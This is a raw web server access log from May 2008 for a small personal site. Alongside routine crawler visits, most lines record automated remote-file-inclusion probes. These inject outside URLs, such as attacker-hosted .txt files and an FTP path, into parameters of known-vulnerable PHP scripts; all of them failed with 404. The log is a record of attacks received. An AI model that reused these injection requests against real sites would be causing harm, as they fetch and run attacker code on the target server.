213.208.165.244 - - [23/May/2008:02:08:42 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://alifeinsports.info/templates/sistem.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
213.208.165.244 - - [23/May/2008:02:08:42 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://alifeinsports.info/templates/sistem.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
65.55.208.134 - - [23/May/2008:02:11:05 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.134 - - [23/May/2008:02:11:05 -0500] "GET /costume/thmb6.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
208.111.154.15 - - [23/May/2008:02:13:17 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
208.111.154.16 - - [23/May/2008:02:13:17 -0500] "GET /rachel%20study HTTP/1.0" 301 326 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
208.111.154.16 - - [23/May/2008:02:13:18 -0500] "GET /rachel%20study/ HTTP/1.0" 200 6339 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
208.116.44.60 - - [23/May/2008:02:17:43 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.ezforum.de/antares/id2.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
208.116.44.60 - - [23/May/2008:02:17:43 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.ezforum.de/antares/id2.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
65.55.208.119 - - [23/May/2008:02:17:44 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.119 - - [23/May/2008:02:17:44 -0500] "GET /logs/access_log.1165190400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
83.166.170.76 - - [23/May/2008:02:18:33 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
83.166.170.76 - - [23/May/2008:02:18:34 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
83.166.170.76 - - [23/May/2008:02:18:38 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
83.166.170.76 - - [23/May/2008:02:18:38 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
65.55.208.119 - - [23/May/2008:02:18:56 -0500] "GET /logs/access_log.1189641600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.119 - - [23/May/2008:02:18:56 -0500] "GET /logs/access_log.1194393600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
64.13.248.31 - - [23/May/2008:02:19:07 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.ezforum.de/antares/id2.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
64.13.248.31 - - [23/May/2008:02:19:07 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.ezforum.de/antares/id2.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
65.55.208.119 - - [23/May/2008:02:21:07 -0500] "GET /logs/access_log.1175990400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.119 - - [23/May/2008:02:21:07 -0500] "GET /logs/access_log.1168905600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.119 - - [23/May/2008:02:21:07 -0500] "GET /logs/access_log.1195603200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.119 - - [23/May/2008:02:22:00 -0500] "GET /logs/access_log.1199145600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.119 - - [23/May/2008:02:22:00 -0500] "GET /logs/access_log.1180137600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.119 - - [23/May/2008:02:22:01 -0500] "GET /artwork/furniture-misc.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.119 - - [23/May/2008:02:22:01 -0500] "GET /logs/access_log.1166054400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
66.7.207.104 - - [23/May/2008:02:22:28 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.togosite.com/forum4/style/readme.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.810"
66.7.207.104 - - [23/May/2008:02:22:29 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.togosite.com/forum4/style/readme.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.810"
202.131.92.138 - - [23/May/2008:02:23:35 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.ezforum.de/antares/arab.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
202.131.92.138 - - [23/May/2008:02:23:36 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.ezforum.de/antares/arab.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
61.222.167.228 - - [23/May/2008:02:33:41 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
61.222.167.228 - - [23/May/2008:02:33:47 -0500] "GET //Neos_Chronos/header.php?base_folder=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
208.111.154.15 - - [23/May/2008:02:36:29 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
208.111.154.16 - - [23/May/2008:02:36:29 -0500] "GET /costume/thmb2.htm HTTP/1.0" 200 3346 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
200.249.155.6 - - [23/May/2008:02:40:44 -0500] "GET /logs//skin/zero_vote/error.php?dir=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
200.249.155.6 - - [23/May/2008:02:40:46 -0500] "GET //skin/zero_vote/error.php?dir=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
209.234.171.33 - - [23/May/2008:02:44:09 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""ia_archiver"
209.234.171.33 - - [23/May/2008:02:44:09 -0500] "GET /costume/costume2.htm HTTP/1.0" 200 1810 "-""ia_archiver"
83.166.170.76 - - [23/May/2008:02:47:28 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
83.166.170.76 - - [23/May/2008:02:47:28 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
83.166.170.76 - - [23/May/2008:02:47:32 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
83.166.170.76 - - [23/May/2008:02:47:32 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
69.16.242.144 - - [23/May/2008:02:48:36 -0500] "GET /logs/access_log.1207785600//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 373 "-""libwww-perl/5.811"
69.16.242.144 - - [23/May/2008:02:48:36 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 346 "-""libwww-perl/5.811"
69.16.242.144 - - [23/May/2008:02:48:36 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 351 "-""libwww-perl/5.811"
211.20.85.150 - - [23/May/2008:02:49:38 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; MSIECrawler)"
208.111.154.16 - - [23/May/2008:02:52:22 -0500] "GET /artwork/carousel.htm HTTP/1.0" 200 814 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
212.227.99.216 - - [23/May/2008:02:54:55 -0500] "GET /logs//Writer.php?mosConfig_absolute_path=http://www.afatherslove.net/gia/arab.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
212.227.99.216 - - [23/May/2008:02:54:55 -0500] "GET //Writer.php?mosConfig_absolute_path=http://www.afatherslove.net/gia/arab.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
68.76.31.154 - - [23/May/2008:03:00:23 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.togosite.com/forum4/style/readme.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.79"
68.76.31.154 - - [23/May/2008:03:00:23 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.togosite.com/forum4/style/readme.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.79"
72.47.201.117 - - [23/May/2008:03:03:58 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 320 "-""Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
208.111.154.15 - - [23/May/2008:03:04:38 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
208.111.154.16 - - [23/May/2008:03:04:38 -0500] "GET /artwork/paintings.htm HTTP/1.0" 200 2300 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
65.55.208.132 - - [23/May/2008:03:06:15 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.132 - - [23/May/2008:03:06:15 -0500] "GET /?N=A HTTP/1.1" 200 1243 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
212.227.99.216 - - [23/May/2008:03:06:43 -0500] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.afatherslove.net/gia/arab.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
212.227.99.216 - - [23/May/2008:03:06:44 -0500] "GET //init_basic.php?GALLERY_BASEDIR=http://www.afatherslove.net/gia/arab.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
212.227.99.216 - - [23/May/2008:03:08:39 -0500] "GET /logs//xajax_functions.php?mosConfig_absolute_path=http://www.afatherslove.net/gia/arab.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
212.227.99.216 - - [23/May/2008:03:08:39 -0500] "GET //xajax_functions.php?mosConfig_absolute_path=http://www.afatherslove.net/gia/arab.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
208.111.154.15 - - [23/May/2008:03:15:13 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
208.111.154.16 - - [23/May/2008:03:15:13 -0500] "GET /artwork/coffins.htm HTTP/1.0" 200 1485 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
208.111.154.15 - - [23/May/2008:03:15:39 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
208.111.154.16 - - [23/May/2008:03:15:39 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
78.137.163.133 - - [23/May/2008:03:16:28 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""-"
78.137.163.133 - - [23/May/2008:03:16:28 -0500] "GET /tattoo/ HTTP/1.1" 200 466 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
200.249.155.6 - - [23/May/2008:03:16:38 -0500] "GET /logs//skin/zero_vote/error.php?dir=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
200.249.155.6 - - [23/May/2008:03:16:43 -0500] "GET //skin/zero_vote/error.php?dir=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
208.111.154.16 - - [23/May/2008:03:18:42 -0500] "GET /artwork/toys.htm HTTP/1.0" 200 1337 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
208.69.121.13 - - [23/May/2008:03:19:41 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.4adab.com//id.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
208.69.121.13 - - [23/May/2008:03:19:41 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.4adab.com//id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
217.67.26.84 - - [23/May/2008:03:20:32 -0500] "GET /logs/!scanftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 355 "-""libwww-perl/5.805"
217.67.26.84 - - [23/May/2008:03:20:32 -0500] "GET /!scanftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 350 "-""libwww-perl/5.805"
207.58.181.74 - - [23/May/2008:03:21:27 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://nozyk.org/rob.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.811"
207.58.181.74 - - [23/May/2008:03:21:27 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://nozyk.org/rob.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
208.111.154.15 - - [23/May/2008:03:22:43 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
208.111.154.15 - - [23/May/2008:03:22:43 -0500] "GET /costume/thmb1.htm HTTP/1.0" 200 3799 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
209.164.178.178 - - [23/May/2008:03:24:16 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://imanicm.com/webcalendar/includes/on.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
209.164.178.178 - - [23/May/2008:03:24:17 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://imanicm.com/webcalendar/includes/on.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
67.19.107.26 - - [23/May/2008:03:24:19 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
67.19.107.26 - - [23/May/2008:03:24:19 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
87.106.178.42 - - [23/May/2008:03:24:24 -0500] "GET /logs/!scanftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 355 "-""libwww-perl/5.805"
87.106.178.42 - - [23/May/2008:03:24:24 -0500] "GET /logs/!scanhttp://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
87.106.178.42 - - [23/May/2008:03:24:25 -0500] "GET /!scanftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 350 "-""libwww-perl/5.805"
87.106.178.42 - - [23/May/2008:03:24:25 -0500] "GET /!scanhttp://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
66.7.203.150 - - [23/May/2008:03:24:29 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
66.7.203.150 - - [23/May/2008:03:24:29 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
67.205.96.205 - - [23/May/2008:03:25:45 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.needvisa.net/arab.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.812"
67.205.96.205 - - [23/May/2008:03:25:45 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.needvisa.net/arab.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.812"
98.173.1.8 - - [23/May/2008:03:26:48 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://imanicm.com/webcalendar/includes/on.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
98.173.1.8 - - [23/May/2008:03:26:48 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://imanicm.com/webcalendar/includes/on.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
62.163.140.46 - - [23/May/2008:03:27:28 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
62.163.140.46 - - [23/May/2008:03:27:28 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
210.48.67.39 - - [23/May/2008:03:29:37 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://medisana.co.kr/test? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
210.48.67.39 - - [23/May/2008:03:29:37 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://medisana.co.kr/test? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
67.205.96.205 - - [23/May/2008:03:30:10 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.campuswatch.net/calendar//tools/albo/id.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.812"
67.205.96.205 - - [23/May/2008:03:30:10 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.campuswatch.net/calendar//tools/albo/id.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.812"
210.48.67.39 - - [23/May/2008:03:30:13 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://medisana.co.kr/test? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
210.48.67.39 - - [23/May/2008:03:30:13 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://medisana.co.kr/test? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
216.188.60.54 - - [23/May/2008:03:34:04 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
216.188.60.54 - - [23/May/2008:03:34:04 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
74.6.17.181 - - [23/May/2008:03:38:47 -0500] "GET /logs/access_log.1182470400 HTTP/1.0" 200 157651 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.18.151.242 - - [23/May/2008:03:46:35 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 357 "-""libwww-perl/5.810"
67.18.151.242 - - [23/May/2008:03:46:36 -0500] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 352 "-""libwww-perl/5.810"
67.18.151.242 - - [23/May/2008:03:47:23 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 369 "-""libwww-perl/5.810"
67.18.151.242 - - [23/May/2008:03:47:23 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 364 "-""libwww-perl/5.810"
67.18.151.242 - - [23/May/2008:03:47:25 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 371 "-""libwww-perl/5.810"
67.18.151.242 - - [23/May/2008:03:47:26 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 366 "-""libwww-perl/5.810"
69.89.25.168 - - [23/May/2008:03:48:29 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
69.89.25.168 - - [23/May/2008:03:48:29 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
189.22.150.131 - - [23/May/2008:03:51:02 -0500] "GET /logs/!scanftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 355 "-""libwww-perl/5.79"
189.22.150.131 - - [23/May/2008:03:51:02 -0500] "GET /!scanftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 350 "-""libwww-perl/5.79"
202.131.92.138 - - [23/May/2008:03:55:06 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
202.131.92.138 - - [23/May/2008:03:55:07 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
58.26.137.64 - - [23/May/2008:03:58:45 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://83.222.131.90/~legitimi/mybase/safe.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.69"
58.26.137.64 - - [23/May/2008:03:58:46 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://83.222.131.90/~legitimi/mybase/safe.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.69"
67.18.151.242 - - [23/May/2008:04:01:44 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 357 "-""libwww-perl/5.810"
67.18.151.242 - - [23/May/2008:04:01:44 -0500] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 352 "-""libwww-perl/5.810"
67.18.151.242 - - [23/May/2008:04:01:59 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 369 "-""libwww-perl/5.810"
67.18.151.242 - - [23/May/2008:04:01:59 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 364 "-""libwww-perl/5.810"
67.18.151.242 - - [23/May/2008:04:03:00 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 371 "-""libwww-perl/5.810"
67.18.151.242 - - [23/May/2008:04:03:01 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 366 "-""libwww-perl/5.810"
202.131.92.138 - - [23/May/2008:04:08:18 -0500] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
202.131.92.138 - - [23/May/2008:04:08:18 -0500] "GET /convert/mvcw.php?step=1&vwar_root=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
67.18.151.242 - - [23/May/2008:04:08:37 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 369 "-""libwww-perl/5.810"
67.18.151.242 - - [23/May/2008:04:08:37 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 364 "-""libwww-perl/5.810"
58.26.137.64 - - [23/May/2008:04:10:49 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.69"
58.26.137.64 - - [23/May/2008:04:10:50 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.69"
213.239.143.14 - - [23/May/2008:04:13:56 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 371 "-""libwww-perl/5.805"
213.239.143.14 - - [23/May/2008:04:13:59 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 366 "-""libwww-perl/5.805"
217.194.33.88 - - [23/May/2008:04:15:02 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.scoutspaloke.be//administrator/backups/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
217.194.33.88 - - [23/May/2008:04:15:02 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.scoutspaloke.be//administrator/backups/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
72.16.148.38 - - [23/May/2008:04:15:19 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 369 "-""libwww-perl/5.79"
72.16.148.38 - - [23/May/2008:04:15:20 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 364 "-""libwww-perl/5.79"
69.16.242.144 - - [23/May/2008:04:17:26 -0500] "GET /logs/access_log.1204761600//modules/vwar/admin/admin.php?vwar_root=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 340 "-""libwww-perl/5.811"
69.16.242.144 - - [23/May/2008:04:17:26 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 313 "-""libwww-perl/5.811"
69.16.242.144 - - [23/May/2008:04:17:26 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 318 "-""libwww-perl/5.811"
72.16.148.38 - - [23/May/2008:04:18:59 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 371 "-""libwww-perl/5.79"
